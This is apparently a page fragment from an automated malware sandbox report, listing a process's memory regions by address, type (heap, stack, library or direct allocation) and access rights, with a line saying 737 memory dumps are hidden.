page read and write
|
||
|
7FE89B00000
|
trusted library allocation
|
page read and write
|
||
|
448E000
|
stack
|
page read and write
|
||
|
4F1B000
|
heap
|
page read and write
|
||
|
20000
|
heap
|
page read and write
|
||
|
536000
|
heap
|
page read and write
|
||
|
3869000
|
heap
|
page read and write
|
||
|
3E90000
|
trusted library allocation
|
page read and write
|
||
|
41C000
|
heap
|
page read and write
|
||
|
3C9000
|
heap
|
page read and write
|
||
|
122B1000
|
trusted library allocation
|
page read and write
|
||
|
4A55000
|
heap
|
page read and write
|
||
|
496E000
|
heap
|
page read and write
|
||
|
3827000
|
heap
|
page read and write
|
||
|
3339000
|
trusted library allocation
|
page read and write
|
||
|
1D90000
|
direct allocation
|
page read and write
|
||
|
2A8000
|
stack
|
page read and write
|
||
|
123F8000
|
trusted library allocation
|
page read and write
|
||
|
2EF000
|
trusted library allocation
|
page read and write
|
||
|
20D1000
|
trusted library allocation
|
page read and write
|
||
|
5AB000
|
heap
|
page read and write
|
||
|
4E21000
|
heap
|
page read and write
|
||
|
4F2D000
|
heap
|
page read and write
|
||
|
4EB000
|
heap
|
page read and write
|
||
|
4C94000
|
heap
|
page read and write
|
||
|
233000
|
stack
|
page read and write
|
||
|
38D000
|
heap
|
page read and write
|
||
|
1CC5000
|
heap
|
page read and write
|
||
|
4F30000
|
heap
|
page read and write
|
||
|
360000
|
direct allocation
|
page read and write
|
||
|
3333000
|
trusted library allocation
|
page read and write
|
||
|
39F000
|
heap
|
page read and write
|
||
|
2F0000
|
heap
|
page read and write
|
||
|
30E000
|
heap
|
page read and write
|
||
|
4ED000
|
heap
|
page read and write
|
||
|
1AF60000
|
heap
|
page read and write
|
||
|
7FE89883000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FE89BB0000
|
trusted library allocation
|
page read and write
|
||
|
7FE89A90000
|
trusted library allocation
|
page read and write
|
||
|
3841000
|
heap
|
page read and write
|
||
|
3827000
|
heap
|
page read and write
|
||
|
92C1000
|
trusted library allocation
|
page read and write
|
||
|
4C8000
|
heap
|
page read and write
|
||
|
386B000
|
heap
|
page read and write
|
||
|
4F14000
|
heap
|
page read and write
|
||
|
445000
|
heap
|
page read and write
|
||
|
37D9000
|
heap
|
page read and write
|
||
|
7FE89BE0000
|
trusted library allocation
|
page read and write
|
||
|
1B20000
|
trusted library allocation
|
page read and write
|
||
|
3C0000
|
heap
|
page read and write
|
||
|
3827000
|
heap
|
page read and write
|
||
|
499B000
|
heap
|
page read and write
|
||
|
386B000
|
heap
|
page read and write
|
||
|
1D0E000
|
heap
|
page execute and read and write
|
||
|
4F0D000
|
heap
|
page read and write
|
||
|
4C95000
|
heap
|
page read and write
|
||
|
4B4000
|
heap
|
page read and write
|
||
|
7FE89B9D000
|
trusted library allocation
|
page read and write
|
||
|
42C1000
|
trusted library allocation
|
page read and write
|
||
|
3C3000
|
heap
|
page read and write
|
There are 737 hidden memdumps, click here to show them.